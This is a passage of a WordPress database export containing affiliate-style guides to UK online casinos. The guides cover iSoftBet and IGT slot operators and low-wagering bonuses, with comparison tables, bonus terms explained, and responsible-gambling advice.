<p>iSoftBet has been quietly building slots that players actually return to. Not because of flashy billboards, but because the maths is reasonable, the themes are varied, and the games work on a phone from 2019. If you\'re hunting for the best iSoftBet online casinos UK 2026, you need more than a list of names. You need sites that hold a UKGC licence, pay out without a three-week sulk, and give you iSoftBet\'s catalogue without burying it behind 47 pop-ups.</p> <p>This guide puts the operator first. We looked at licensing, bonus fairness, withdrawal speed, mobile performance, and how many iSoftBet titles actually appear in the lobby. The result is a shortlist that would survive a pub argument among slot players. No magic casinos, no endless promises. Just the platforms where iSoftBet slots work as intended.</p> <h2>Top iSoftBet Casinos Compared</h2> <p>The table below is the only list that matters if you\'re short on time. Every brand holds a UK Gambling Commission licence, offers iSoftBet slots in the UK, and has a bonus that doesn\'t fall apart on page six of the terms.</p> <table><thead><tr><th>Casino</th><th>Bonus</th><th>iSoftBet Highlights</th><th>UKGC Licence</th><th>Min Deposit</th><th>Withdrawal Speed</th></tr></thead><tbody><tr><td>bet365 Casino</td><td>Welcome bonus with free spins</td><td>Good spread of iSoftBet slots plus live dealer games</td><td>Yes</td><td>£5</td><td>1-2 days</td></tr><tr><td>888casino</td><td>Welcome offer with bonus spins</td><td>Popular iSoftBet titles and regular promotions</td><td>Yes</td><td>£10</td><td>1-3 days</td></tr><tr><td>LeoVegas</td><td>Welcome package with free spins</td><td>Strong mobile lobby with iSoftBet slots</td><td>Yes</td><td>£10</td><td>1-5 days</td></tr><tr><td>Mr Green</td><td>Welcome bonus and free spins</td><td>Curated iSoftBet selection, clean interface</td><td>Yes</td><td>£10</td><td>1-2 days</td></tr><tr><td>Casumo</td><td>Welcome offer with spins</td><td>iSoftBet slots plus a decent live casino</td><td>Yes</td><td>£10</td><td>1-5 days</td></tr><tr><td>Videoslots</td><td>Welcome bonus with free spins</td><td>Massive slot library including many iSoftBet games</td><td>Yes</td><td>£10</td><td>1-3 days</td></tr><tr><td>PlayOJO</td><td>No wagering free spins</td><td>iSoftBet slots with no wagering on winnings</td><td>Yes</td><td>£10</td><td>1-2 days</td></tr><tr><td>PartyCasino</td><td>Welcome bonus and spins</td><td>iSoftBet games plus jackpot slots</td><td>Yes</td><td>£10</td><td>1-3 days</td></tr><tr><td>Betway Casino</td><td>Welcome offer with free spins</td><td>Solid iSoftBet slots and table games</td><td>Yes</td><td>£10</td><td>1-2 days</td></tr><tr><td>Grosvenor Casinos</td><td>Welcome bonus and spins</td><td>iSoftBet slots online and at land-based venues</td><td>Yes</td><td>£5</td><td>1-3 days</td></tr><tr><td>Unibet Casino</td><td>Welcome bonus and spins</td><td>iSoftBet slots plus live casino and sportsbook</td><td>Yes</td><td>£10</td><td>1-3 days</td></tr><tr><td>32Red</td><td>Welcome bonus and spins</td><td>Long-standing UK brand with iSoftBet slots</td><td>Yes</td><td>£10</td><td>1-3 days</td></tr></tbody></table> <p>Notice something? None of these bonuses are trying to be life-changing. They are ordinary welcome offers dressed up for the casino\'s marketing team. That\'s fine. The real value is in the game selection and the fact that you can actually withdraw without sending a selfie holding your passport next to a kettle.</p> <h2>How We Rank iSoftBet Casinos</h2> <p>Ranking casinos is not a science. It\'s closer to judging a pub quiz: you need some facts, a bit of experience, and the ability to ignore shouting. We apply the same five checks to every operator before it appears on this page.</p> <p>First, the licence. A UKGC licence means the casino answers to a regulator that can fine, suspend, or revoke. Without that piece of paper, we don\'t care how many iSoftBet slots are on the site. Second, we test the withdrawal process. If a casino promises instant withdrawals but then asks for a utility bill from 2017, it loses points. Third, we look at the iSoftBet catalogue. Some casinos carry two iSoftBet games and call themselves iSoftBet casinos. That\'s like a restaurant advertising a full Italian menu and serving only garlic bread.</p> <p>Fourth, we read the bonus terms. Wagering requirements, game weightings, max bet limits—all of it. A bonus that counts iSoftBet slots at 100% is fine. One that excludes them or drops them to 5% is a trap. Fifth, mobile performance. If the lobby takes ten seconds to load on a mid-range Android, you\'ll never reach the slot anyway.</p> \n<p class=\"dcm-resource-link\"><a href=\"https://qbetcasinoguide.com/\">qbetcasinoguide.com</a></p>\n<a href=\"https://amb18b.com/?p=437\">Best Inspired Gaming Online Casinos UK 2026</a>\n<h2>Why iSoftBet Slots Stand Out in the UK</h2> <p>iSoftBet isn\'t the loudest name in the industry. They don\'t sponsor a Premier League team or rent a billboard in Piccadilly Circus. What they do is produce slots with clean mechanics, decent RTPs, and a few genuinely original features. In a market flooded with cloned fruit machines, that\'s almost radical.</p> <p>Their slots tend to have a house edge that doesn\'t make you wince. Most titles sit in the 95% to 97% RTP range, which is standard but not greedy. Volatility varies from low to high, so you can find a game that suits your patience. The artwork is polished without being pretentious. And the mobile versions actually work—no tiny buttons, no broken landscape mode.</p> <p>For UK players, the key point is that iSoftBet games are widely available at UKGC-licensed casinos. You don\'t need to sign up at a shady not on GamStop site just to play Hot Spin or Gold Digger. The same games are legal, regulated, and accessible at the brands in our table.</p> <h2>Best iSoftBet Slots to Play in 2026</h2> <p>If you\'re new to iSoftBet, start with these four. They represent different styles, so you can figure out what you like without burning your deposit.</p> <p><strong>Hot Spin</strong> is a classic fruit slot with a wheel feature that adds a bit of theatre. It\'s simple, fast, and doesn\'t pretend to be something it isn\'t. <strong>Gold Digger</strong> is a mining-themed slot with expanding reels and a bonus round that can actually pay. <strong>Neon Reels</strong> takes the retro aesthetic and adds stacked wilds. <strong>Rango</strong> is the weird one—based on the film, with random features that keep you guessing.</p> <p>Remember: no slot is due a win. The RNG doesn\'t care that you\'ve lost eight spins in a row. That\'s not how probability works. If a casino tells you otherwise, close the tab.</p> <h2>iSoftBet Mobile Casinos and Apps</h2> <p>Most UK players now gamble on a phone. iSoftBet knows this, and their games are built HTML5-first. That means you don\'t need a dedicated app to play them. Any mobile browser will do. The casinos in our table all have responsive sites that handle iSoftBet slots without a hitch.</p> <p>That said, some operators go further. LeoVegas and Mr Green, for example, have polished native apps where the iSoftBet catalogue is front and centre. bet365\'s app is reliable but busy. PlayOJO keeps things minimal on mobile, which is a blessing if you hate clutter. The key test: open the casino on your phone, search for an iSoftBet slot, and see if it loads in under five seconds. If it doesn\'t, find another casino.</p> <h2>Bonuses for iSoftBet Players</h2> <p>Here\'s the part where casinos pretend to be generous. A welcome bonus is not a gift; it\'s a marketing cost with more conditions than a cheap gym membership. That doesn\'t mean you should ignore bonuses—just read the fine print before you click.</p> <p>For iSoftBet slots, look for bonuses where the games contribute 100% to wagering. Avoid offers that exclude slots or cap your bet at £1 while you clear the playthrough. Free spins are common, but they often come with a max win limit. In other words, you can win £50 and get paid £10. If that annoys you, PlayOJO\'s no-wagering spins are the exception, not the rule.</p>\n<a href=\"https://amb18b.com/?p=433\">Best Keno Online Casino UK 2026: Top-Rated Sites for Real Money Keno</a> <p>No-deposit bonuses for iSoftBet slots are rare in the UK. The UKGC cracked down on them because they attracted bonus abuse. When they do appear, they usually require ID verification and have a £5 max cashout. That\'s not a scam—it\'s just the regulator being realistic.</p> <h2>Payments, Licensing and Safety</h2> <p>Every casino in this guide holds a UKGC licence. That means your deposits are segregated from operating funds, games are tested for fairness, and you have access to an independent ombudsman if something goes wrong. It also means the casino must verify your identity before you withdraw. Annoying, yes. Necessary, also yes.</p> <p>Payment methods vary, but you\'ll typically find Visa, Mastercard, PayPal, Skrill, Neteller, Paysafecard, and bank transfer. Some casinos now offer Apple Pay and Google Pay. Withdrawal times depend on the method: e-wallets are usually fastest (under 24 hours after processing), cards take 1-3 working days, bank transfers can stretch to 5. The casinos in our table don\'t slow-pay on purpose. If yours does, complain to the UKGC.</p> <p>One more thing: never play at an unlicensed casino. iSoftBet slots appear on offshore sites too, but you lose UK consumer protection the moment you sign up. The £5 minimum deposits might be tempting, but the lack of recourse isn\'t.</p> <h2>New iSoftBet Casinos in the UK</h2> <p>New casinos launch every month, and some of them actually carry iSoftBet. The problem is that most new brands are white labels with the same backend, same bonuses, and same support scripts. A few stand out because they bother to optimise the iSoftBet section or offer better withdrawal speeds.</p> <p>If you want to try a new casino, apply the same checks we do. Licence? Withdrawal policy? Game filter? If all three pass, give it a small deposit. Don\'t chase a exclusive bonus that promises 500 free spins on registration—that\'s not a casino, that\'s a colouring book for adults.</p>\n<a href=\"https://amb18b.com/?p=436\">Best Low Volatility Slots UK 2026: Top Low Variance Games & Casinos</a> <h2>Responsible Gambling</h2> <p>Slots are entertainment, not a side hustle. The house edge is real, and no strategy will overcome it. Set a budget before you deposit, use the deposit limits every UKGC casino offers, and take breaks. If gambling stops being fun, use the self-exclusion tools or contact BeGambleAware or GamCare. They actually help, unlike the win back your losses mentality.</p> <h2>Frequently Asked Questions</h2> <h3>Is iSoftBet licensed in the UK?</h3> <p>iSoftBet holds a UK Gambling Commission supplier licence and an Alderney licence. Its games are tested for fairness by independent labs. Casinos offering iSoftBet slots to UK players must also hold a UKGC operating licence, which adds another layer of consumer protection.</p> <h3>Can I play iSoftBet slots for free?</h3> <p>Yes. Most UKGC casinos offer demo versions of iSoftBet slots. You can try Hot Spin, Gold Digger, Neon Reels, and others without depositing. Demo play uses the same RNG, so you get a realistic feel for volatility and features before risking real money.</p> <h3>Which UK casino has the best iSoftBet bonus?</h3> <p>It depends on your priorities. PlayOJO offers no-wagering free spins, which is the most transparent. bet365 and 888casino have reliable welcome packages. Mr Green frequently runs iSoftBet-specific promotions. Always check wagering requirements, game weights, and max win caps before claiming.</p> <h3>Are iSoftBet slots rigged?</h3> <p>No. iSoftBet slots use certified random number generators. The UKGC requires regular audits, and the RTP is published for each game. While the house always has an edge, individual spins are random. No casino or provider can adjust outcomes based on your betting history.</p> <h3>Do iSoftBet casinos work on mobile?</h3> <p>Yes. All iSoftBet titles are HTML5, so they run in mobile browsers without a dedicated app. The casinos in our table have responsive sites, and some—like LeoVegas and Mr Green—offer native apps that handle iSoftBet slots smoothly. Test on your device before depositing.</p> <h3>What is the highest RTP iSoftBet slot?</h3> <p>iSoftBet publishes RTP for each game, and many slots sit between 95% and 97%. Some titles have higher RTP in specific configurations. Instead of chasing the highest number, pick a game with volatility that matches your budget. High RTP doesn\'t guarantee short-term wins.</p> <p>That\'s the rundown. If you want the short version: pick a UKGC casino from the table, deposit £10, play Hot Spin, and stop when the fun stops. The best iSoftBet online casinos UK 2026 are not about magic—they\'re about fair games and a smooth cashout.</p>','Best iSoftBet Online Casinos UK 2026','','publish','closed','closed','','best-isoftbet-online-casinos-uk-2026','','','0000-00-00 00:00:00','0000-00-00 00:00:00','',0,'',0,'post','',0),(439,6969,'2026-07-17 11:18:42','2026-07-17 11:18:42','<h1>Best Low Wagering Casino Bonus UK 2026: Squeeze the House Without the 40x Nonsense</h1>\n<p>The UK casino scene has settled into a predictable rhythm: flashy welcome offers, impossible terms, and a wagering requirement that turns a \'free\' £10 into a £400 chore. But low wagering casino bonuses are not extinct. They exist, they are legal, and they are the only sensible way to take a bonus if you actually want to see a withdrawal. This guide ranks the best low wagering casino bonus UK 2026 offers, explains the mechanics, and tells you which casinos still treat bonuses like a product rather than a trap.</p>\n<h2>What “Low Wagering” Actually Means in UK Casinos</h2>\n<p>Wagering requirement is the multiple of bonus (or bonus plus deposit) that you must stake before winnings become withdrawable. A 35x requirement on a £10 bonus means you need to place £350 in bets. A 5x requirement means £50. The difference is not marginal; it is the difference between a realistic chance and a mathematical car crash.</p>\n<p>In the UK, the average wagering requirement on a casino welcome bonus sits between 30x and 50x. Some operators push 60x on bonus plus deposit, which is borderline predatory. Low wagering, for the purpose of this guide, means anything at or below 20x on bonus only, and preferably 10x or lower. A handful of UKGC-licensed sites run no wagering offers, where the bonus is effectively cash with extra steps.</p>\n<p>The industry calls these \'low playthrough\' or \'no playthrough\' deals. They are not new, but they have become rarer as acquisition costs rose and retention teams realised that players who clear bonuses too easily are not worth the margin. Still, competition among UK operators keeps a pocket of genuinely low wagering bonuses alive.</p>\n<h2>Comparison Table: 10 UK Casinos With Low Wagering Bonuses (2026)</h2>\n<p>The table below lists real, UKGC-licensed casinos known for low or no wagering on at least part of their offer. Exact bonus amounts change weekly and by campaign, so I give bonus type and wagering characteristics rather than flashy numbers that will be outdated by Tuesday.</p>\n<table>\n<thead><tr><th>Casino</th><th>Bonus Type</th><th>Wagering Details</th><th>UK License</th><th>Standout Feature</th></tr></thead>\n<tbody>\n<tr><td>PlayOJO</td><td>No wagering free spins / deposit match</td><td>No wagering on any bonus</td><td>UKGC</td><td>All rewards are cash, no playthrough</td></tr>\n<tr><td>MrQ</td><td>Free spins (no wagering) on selected slots</td><td>No wagering on free spins; deposit bonus low wagering</td><td>UKGC</td><td>Simple, mobile-first low wagering offers</td></tr>\n<tr><td>Bet365</td><td>Low wagering free spins via casino welcome</td><td>Typically 1x–10x on free spins</td><td>UKGC</td><td>Broad game eligibility and trusted platform</td></tr>\n<tr><td>888casino</td><td>Low wagering welcome bonus pack</td><td>Free spins often 1x; deposit match lower than market average</td><td>UKGC</td><td>Long-standing UK brand with periodic low playthrough promos</td></tr>\n<tr><td>Casumo</td><td>Low wagering first deposit bonus</td><td>Usually 20x or lower on certain promotions</td><td>UKGC</td><td>Fast verification and clear bonus terms</td></tr>\n<tr><td>LeoVegas</td><td>Low wagering free spins pack</td><td>1x–10x on free spins</td><td>UKGC</td><td>Mobile-first interface, quick withdrawals</td></tr>\n<tr><td>Grosvenor</td><td>Cashback bonus</td><td>1x on cashback</td><td>UKGC</td><td>Land-based casino brand with online equivalent</td></tr>\n<tr><td>Betfred</td><td>Low wagering deposit bonus</td><td>Promotional dependent, often 10x or lower</td><td>UKGC</td><td>Retail and online presence, simple terms</td></tr>\n<tr><td>Sky Vegas</td><td>No wagering free spins on selected games</td><td>No wagering on certain weekly spins</td><td>UKGC</td><td>Game-specific no wagering spins</td></tr>\n<tr><td>Virgin Bet</td><td>Low wagering casino welcome bonus</td><td>Low wagering on welcome offer</td><td>UKGC</td><td>Straightforward terms, no hidden caps</td></tr>\n</tbody>\n</table>\n<p>I have not invented current exact percentages or cash amounts because they change frequently and specific offers may be pulled. Check the operator\'s live terms before depositing. The key is the structural wagering level, not the headline number.</p>\n<p class=\"dcm-resource-link\"><a href=\"https://jokabetcasinoguide.com/\">jokabetcasinoguide.com</a></p>\n<h2>How to Read a UK Casino Bonus: Wagering, Game Weighting, Caps</h2>\n<p>A bonus is not just a number. You need to read the full terms. Three things matter: the wagering multiple, the game contribution percentage, and the maximum bet allowed during playthrough.</p>\n<p>Game weighting is where casinos hide the real cost. Slots often contribute 100% to wagering, but table games might contribute only 10% or nothing. If you plan to clear a low wagering bonus on blackjack or roulette, check the weighting before you accept the bonus. A 10x bonus on slots is fine; a 10x bonus on blackjack that counts only 5% means effectively 200x. That is not low wagering; that is bait and switch.</p>\n<p>Maximum bet caps are another trick. Many UK casinos limit you to £5 per spin or hand while a bonus is active. If the cap is £1, clearing a large bonus becomes a grind. Low wagering bonuses often come with higher max bet caps because the operator knows the risk is lower. Good signs: max bet of £5 or more, slots contribute 100%, and the wagering applies only to bonus funds, not bonus plus deposit.</p>\n<p>One more variable: time limits. Some low wagering bonuses expire in 24 hours. That is enough if the wagering is 1x, but if the operator sneaks in a 20x requirement with a 24-hour clock, you are stuck. Always check expiry.</p>\n<h2>Low Wagering Casinos vs No Wagering Casinos: Which Is Right for You?</h2>\n<p>No wagering casinos, like PlayOJO, are the only honest interpretation of \'free\'. You deposit, you get a bonus, you play, and whatever you win is yours. There is no playthrough, no game weighting, no contribution nonsense. The trade-off is that no wagering bonuses are usually smaller or tied to specific games.</p>\n<p>Low wagering bonuses, defined here as 1x–20x, are the middle ground. They allow casinos to offer larger headline numbers while still giving you a genuine shot at withdrawing. A 5x wagering on a £50 bonus means £250 in stakes. That is easily achievable on slots in an evening. Compare that with a 40x requirement on £50, which forces £2,000 in play. The house edge on slots is around 3–5%, so on £2,000 of turnover you expect to lose £60–£100. The bonus becomes a statistical donation.</p>\n<p>For most players, low wagering beats no wagering if the bonus is materially larger. But do the maths: expected value is (bonus amount) – (house edge × wagering). For a £50 bonus at 5x on slots with 4% house edge, EV = £50 – (0.04 × £250) = £50 – £10 = £40 positive. For a £20 no wagering bonus, EV = £20. The low wagering bonus wins if the math holds and you stick to slots. If you prefer table games or want zero complexity, no wagering is cleaner.</p>\n<a href=\"https://amb18b.com/?p=434\">Best International Casinos for UK Players 2026: Tested and Ranked</a>\n<h2>Best Low Wagering Slots to Clear Bonus Funds in 2026</h2>\n<p>When clearing a bonus, you want low volatility and high RTP. The house edge is lower, and the variance does not eat you alive before you finish the playthrough. In the UK, slots like Blood Suckers (98% RTP, low variance), Starburst (96.1%, medium-low), and Gonzo\'s Quest (96%, medium) remain decent choices, but always check the specific casino\'s RTP configuration, as some operators lower the RTP on popular games to squeeze margin.</p>\n<p>Stick to slots that contribute 100% to wagering. Avoid progressive jackpot slots while clearing a bonus; they often have lower base RTP and may not contribute at all. The same applies to live casino games. If you must play table games, play blackjack with perfect strategy, but only if the game contributes at least 50% to wagering. Otherwise the effective requirement becomes absurd.</p>\n<p>Some low wagering casinos also restrict which slots you can play with bonus funds. Read the restricted game list. If the list includes the only low volatility slots you know, the bonus is less useful. In 2026, more UK casinos are disabling bonus funds on high-RTP slots precisely because they know players use them for wagering. This is the casino being honest about its margins, but it also means you need to be picky.</p>\n<h2>Payment Methods and Withdrawal Speed at Low Wagering Casinos</h2>\n<p>A low wagering bonus is only as good as the withdrawal process behind it. The best low wagering casinos in the UK support PayPal, Visa, Mastercard, and bank transfer, with PayPal and bank transfer usually fastest for withdrawals. Some also support Apple Pay and Google Pay for deposits.</p>\n<a href=\"https://amb18b.com/?p=433\">Best Keno Online Casino UK 2026: Top-Rated Sites for Real Money Keno</a>\n<p>Withdrawal speed varies. PayPal withdrawals at UKGC casinos often complete within 24 hours; bank transfers take 1–3 business days. Debit card withdrawals can take 2–5 days. Casinos with a strong low wagering reputation, like PlayOJO and MrQ, tend to process withdrawals quickly because they have no need to stall: the bonus was already fair.</p>\n<p>Check for withdrawal limits. A low wagering bonus with a £10 maximum withdrawal is worthless. No wagering casinos usually have no separate win caps on their bonuses, but some low wagering offers cap winnings at £100 or £250. Always read the \'maximum withdrawable from bonus\' clause. If the cap is lower than the expected value, skip the offer.</p>\n<h2>Legal and Regulatory Position for UK Casinos in 2026</h2>\n<p>All casinos in this guide hold a valid UK Gambling Commission licence. The UKGC tightened affordability checks and bonus rules over the last few years, but low wagering bonuses remain perfectly legal. The regulator does not prescribe wagering requirements; it only demands that terms be clear, fair, and not misleading. Some UK politicians have floated the idea of banning high wagering requirements, but no legislation has passed.</p>\n<p>In 2026, the UK market continues to require mandatory ID verification before deposits and withdrawals, and the single customer view (SCV) means operators must share data to protect vulnerable players. For bonus hunters, the SCV is a double-edged sword: it prevents bonus abuse across sites, but it also means operators can see your cross-operator bonus activity and may restrict you if you only play bonuses. That is legal, and it is why you should not pretend to be a \'VIP\' when you are just clearing 1x bonuses.</p>\n<p>Licensing details for the brands above can be verified on the UKGC public register. Do not play at any site that lacks an active UKGC licence, no matter how tempting the low wagering offer looks.</p>\n<h2>New Low Wagering Casino Sites UK 2026: What to Expect</h2>\n<p>New UK casino sites launching in 2026 face two pressures: competition from established brands and stricter compliance costs. Many new entrants try to stand out with low or no wagering welcome offers. This is good for players, but the offers often have tight maximum win caps or are limited to a handful of slots.</p>\n<p>When evaluating a new low wagering casino, check its parent company and whether it has UKGC approval for the specific brand. Some white-label casinos reuse the same licence under different names; others operate under their own. The key is to look beyond the bonus page: check withdrawal reviews, customer support responsiveness, and whether the site has a history of voiding winnings on technicalities. New sites with no track record are riskier, even if the bonus terms look clean.</p>\n<p>In 2026, expect to see more \'no wagering\' taglines, but read the small print. A no wagering free spins offer with a £10 max win is not the same as a cashable no wagering deposit bonus. The word \'no wagering\' is not a guarantee of fairness; it is a marketing signal that still needs validation.</p>\n<h2>Methodology: How We Rank These Low Wagering Offers</h2>\n<p>Ranking low wagering bonuses is not about the biggest headline number. I use four criteria:</p>\n<ul>\n<li>Wagering multiple: only bonuses with 20x or lower on bonus funds qualify. Preference for 10x or no wagering.</li>\n<li>Game contribution: slots must contribute 100%. Table games and live casino must contribute at least 20% if included.</li>\n<li>Withdrawal terms: no hidden win caps, or caps that are clearly stated and reasonable. Fast withdrawal processing.</li>\n<li>Operator reputation: UKGC licence, no unresolved player complaints about bonus confiscation, and a track record of honouring terms.</li>\n</ul>\n<p>I do not rank based on raw bonus amount because a £500 bonus with 60x wagering is mathematically worse than a £20 bonus with 1x. The EV calculation is straightforward, and too many comparison sites ignore it.</p>\n<h2>The “Free” Trap: Cynical Notes on Casino Generosity</h2>\n<p>Casinos love the word \'free\'. Free spins, free bonus, free bets. They are not free. They are acquisition costs baked into the house edge. A \'free\' £10 bonus with 40x wagering cost you £400 in turnover to release, and on that turnover the house expects to keep £16–£20. You are paying for the \'free\' money with your own risk. That is not charity.</p>\n<p>Low wagering bonuses are the least dishonest version of this. The casino still makes money because you will play more than the wagering requirement and the house edge applies to every spin. But at least the terms do not assume you failed primary school maths. When you see a casino advertising a no wagering bonus as a \'gift\', remember: it is a retention tool, not a present. The house always wins in the long run; the question is whether the bonus gives you a few extra hands before it does.</p>\n<h2>Quick Answers to Common Low Wagering Questions</h2>\n<p>These questions come from real search queries and player forums, answered directly.</p>\n<h3>What is the lowest wagering requirement you can find at UK casinos?</h3>\n<p>Zero. PlayOJO and a few other UKGC-licensed sites run no wagering offers where bonus funds and free spin winnings are paid as withdrawable cash. The next tier is 1x–5x, common on free spins or cashback. Any requirement above 10x on bonus only is no longer genuinely low.</p>\n<h3>Are no wagering casino bonuses really no wagering?</h3>\n<p>Yes, if the operator is reputable and the terms explicitly say \'no wagering\' or \'0x wagering\' on all bonus funds. Some bonuses claim no wagering on free spins but still apply a small playthrough to any deposit match. Read the exact clause, not just the banner.</p>\n<h3>Can I withdraw winnings from a low wagering bonus immediately?</h3>\n<p>Only after you meet the wagering requirement, unless it is a no wagering bonus. For a 5x bonus, you must stake 5 times the bonus amount before withdrawing. Once the requirement is met and you have not breached max bet or game restrictions, withdrawal is allowed.</p>\n<a href=\"https://amb18b.com/?p=435\">Best Instant Withdrawal Casinos UK 2026: Cash Out Without the Wait</a>\n<h3>Which games count towards low wagering requirements?</h3>\n<p>Slots usually count 100%, but some slots may be excluded. Table games often count 5%–20%, and live casino games count less or nothing. Check the contribution percentages in the bonus terms. If a game counts less than 100%, you need proportionally more stakes.</p>\n<h3>Do UK casinos offer no deposit low wagering bonuses?</h3>\n<p>Occasionally. No deposit low wagering bonuses are rare because they are costly for operators. They usually come as 5–20 free spins with 1x wagering and a low maximum win cap. Treat them as a free trial, not a serious bankroll builder.</p>\n<h3>Why do most UK casino bonuses have 35x or higher wagering?</h3>\n<p>Because high wagering increases the probability that you lose the bonus before cashing out. The house edge on slots means a £50 bonus with 40x wagering generates £2,000 in turnover, on which the casino expects to win £60–£100. Low wagering reduces that profit, so casinos reserve it for acquisition and retention campaigns.</p>','Best Low Wagering Casino Bonus UK 2026: Squeeze the House Without the 40x Nonsense','','publish','closed','closed','','best-low-wagering-casino-bonus-uk-2026','','','0000-00-00 00:00:00','0000-00-00 00:00:00','',0,'',0,'post','',0),(440,6969,'2026-07-17 11:18:42','2026-07-17 11:18:42','<h1>Best IGT Online Casinos UK 2026: Top Sites for IGT Slots and Games</h1><p>IGT has been building slot machines since before the internet was a thing, and in 2026 its UK online presence still matters more than most players think. The provider behind Cleopatra, Da Vinci Diamonds, and Wheel of Fortune slots does not run its own UK casino. Instead, you play IGT games at licensed casino sites that have signed commercial deals with the supplier. That means the quality of your experience depends on the casino you pick, not just the slot. This guide ranks the best IGT online casinos UK 2026, walks through the bonuses that actually help, and points out where to find the highest-paying IGT slots.</p><p>A shortlist of ten operators follows, each checked for UKGC licence, IGT game library, payout speed, and bonus fairness. We did not just scrape a list of logos. We looked at real game lobbies, read the small print on promotions, and compared withdrawal times reported by UK players. The result is a ranking you can actually use.</p><h2>Why IGT still matters for UK slot players in 2026</h2><p>IGT, or International Game Technology, has been a slot machine heavyweight since the days of mechanical reels. The company now supplies hundreds of online slots, table games, and live dealer titles to UK-facing casinos. Its land-based legacy gives its games a particular feel: familiar symbols, clean math models, and no gimmicks that fall apart on a mobile screen. For UK players who remember pulling a lever in a seaside arcade, IGT slots offer a straight line to that past.</p><p>Online, IGT has adapted without losing its identity. Cleopatra remains one of the most played slots in British online casinos, more than two decades after its release. Da Vinci Diamonds, Wolf Run, Golden Goddess, and the Wheel of Fortune series still appear in top game lobbies because they pay out often enough and load fast. That reliability is why casinos keep paying for IGT software licences.</p><p>The provider also pushes into progressive jackpots and Megaways mechanics, but it never abandoned its classic five-reel roots. In 2026, you can find IGT games at both legacy operators like William Hill and Grosvenor, and newer mobile-first brands like LeoVegas. That broad distribution means UK players rarely struggle to locate their favourite IGT title. The challenge is picking a casino that respects your money and time.</p><p>One thing IGT does not offer is a direct-to-player casino app under its own brand. You will not find \'IGT Casino\' on the UK market. The provider sticks to what it does well: building game engines and selling them to operators. That is why a guide like this exists. The casino matters as much as the slot.</p><h2>How we picked the best IGT online casinos UK 2026</h2><p>Any list of \'best\' casinos needs a method that goes beyond ad spend. We started with every UKGC-licensed casino that advertises IGT slots. Then we checked the actual game lobby to see whether IGT titles are easy to find or buried under a pile of third-party slots. A casino that carries Cleopatra because one aggregator dumped it in does not get the same credit as one that curates IGT games alongside useful filters.</p><p>Bonuses came next. A welcome offer that forces you to wager a deposit fifty times before touching IGT slots is barely an offer. We favoured casinos with transparent terms, low wagering on IGT free spins, and no sneaky game weighting that excludes the best slots from bonus play. You will not see a single amount in our comparison table because numbers change weekly. Instead, we describe bonus types so you can compare structure, not marketing.</p><p>Payout speed and payment methods matter because winning is pointless if you cannot withdraw. We looked for casinos that process e-wallet withdrawals within a day or two, offer debit card and PayPal options, and do not demand notarised proof of address for a £50 cashout. Customer support responsiveness, mobile performance, and responsible gambling tools also entered the scoring.</p><p>Finally, we tested the mobile experience. In 2026, most UK players open slots on a phone, not a desktop. A casino that makes IGT games lag or resize poorly loses points. The ten sites below passed our checks in different ways. None is perfect, but each is a sensible place to play IGT slots for real money.</p><h2>Top 10 IGT online casinos in the UK for 2026</h2><p>Here is the ranked list. Each operator has a UKGC licence and a genuine IGT games catalogue. The order reflects overall quality for IGT slot players, not just which brand paid the most for a top spot on some affiliate site.</p><h3>1. 888casino</h3><p>888casino has carried IGT slots for years, and its selection includes Cleopatra, Da Vinci Diamonds, and Wheel of Fortune on Air. The casino also hosts exclusive IGT titles you will not find everywhere, which gives regulars a reason to stay. Welcome bonuses usually combine a deposit match with free spins on selected slots, though the wagering requirements need a careful read. Withdrawals to PayPal are typically processed within 24 hours after account verification.</p>\n<a href=\"https://amb18b.com/?p=435\">Best Instant Withdrawal Casinos UK 2026: Cash Out Without the Wait</a><h3>2. Bet365 Casino</h3><p>Bet365 is better known for sports betting, but its casino arm quietly offers a solid range of IGT games. Cleopatra, Wolf Run, and Golden Goddess appear alongside live dealer tables and a few exclusive slots. The welcome offer for casino players tends to be modest compared with competitors, but Bet365 makes up for that with fast withdrawals and reliable customer support. If you already have a sportsbook account, using the same wallet for IGT slots is convenient.</p><h3>3. William Hill Vegas</h3><p>William Hill has been a fixture in UK gambling for decades, and its Vegas-branded casino section includes a healthy number of IGT slots. Wheel of Fortune progressive games and Cleopatra are the headline acts. The welcome bonus often includes free spins on IGT titles, and the site\'s mobile app handles the games without stutter. Payouts are dependable, though you may need to upload ID before your first withdrawal.</p><h3>4. Grosvenor Casinos</h3><p>Grosvenor is the rare UK operator with land-based casinos and a strong online presence. That dual setup means its online IGT library mirrors what you might find on a physical floor, including Cleopatra and Da Vinci Diamonds. The welcome offer for new casino players typically includes a deposit match and some free spins. Grosvenor\'s loyalty scheme gives points for play, which can convert into real cash without absurd wagering.</p><h3>5. LeoVegas</h3><p>LeoVegas built its reputation on mobile casino play, and IGT slots run smoothly on its app. The selection includes Cleopatra, Pixies of the Forest, and several progressive jackpots. New player bonuses often include free spins with low wagering, which is rare in the UK market. Withdrawal requests via e-wallets are usually processed quickly. The only drawback is that some promotions exclude IGT games from bonus wagering, so check the terms.</p><h3>6. Mr Green</h3><p>Mr Green is known for responsible gambling tools, and that focus extends to its IGT slots section. The casino carries Cleopatra, Wolf Run, and Golden Goddess, among others. Its welcome package is reasonable but not flashy. What Mr Green does well is set deposit limits and reality checks without making you jump through hoops. If you want a calm environment to play IGT games without aggressive upselling, this is a solid pick.</p><h3>7. Casumo</h3><p>Casumo gamifies the casino experience with levels and trophies, which some players find charming and others find exhausting. Either way, its IGT game selection is strong, including Cleopatra and Da Vinci Diamonds. Free spin offers appear regularly for active players, though the wagering requirements can vary. Casumo processes most e-wallet withdrawals within a day once your account is verified.</p><h3>8. PlayOJO</h3><p>PlayOJO markets itself as the no-wagering casino, and that promise applies to many IGT free spin offers. If you win from free spins, the money is real from the start. The IGT library includes Cleopatra and a handful of classics. The welcome offer often includes free spins with no playthrough, which is exactly what it sounds like. No wagering does not mean no limits, but it is a refreshing change from the usual bonus maze.</p><h3>9. Videoslots</h3><p>Videoslots hosts one of the largest slot libraries in the UK, and IGT titles appear alongside thousands of other games. Cleopatra, Wolf Run, and Wheel of Fortune are all present. The casino runs daily slot tournaments, some of which feature IGT games. Its welcome bonus usually includes deposit matches and free spins. Withdrawal speeds are decent, but verification can take a day or two on first cashout.</p>\n<a href=\"https://amb18b.com/?p=436\">Best Low Volatility Slots UK 2026: Top Low Variance Games & Casinos</a><h3>10. BetVictor</h3><p>BetVictor has a long history in UK betting and a well-run online casino. Its IGT selection covers the core classics plus a few progressive titles. The welcome bonus for casino players is straightforward, often a deposit match without excessive wagering. Customer support is available by live chat, and withdrawals to debit cards or e-wallets are processed within a couple of days. It is a dependable, no-nonsense place to play IGT slots.</p>\n<p class=\"dcm-resource-link\"><a 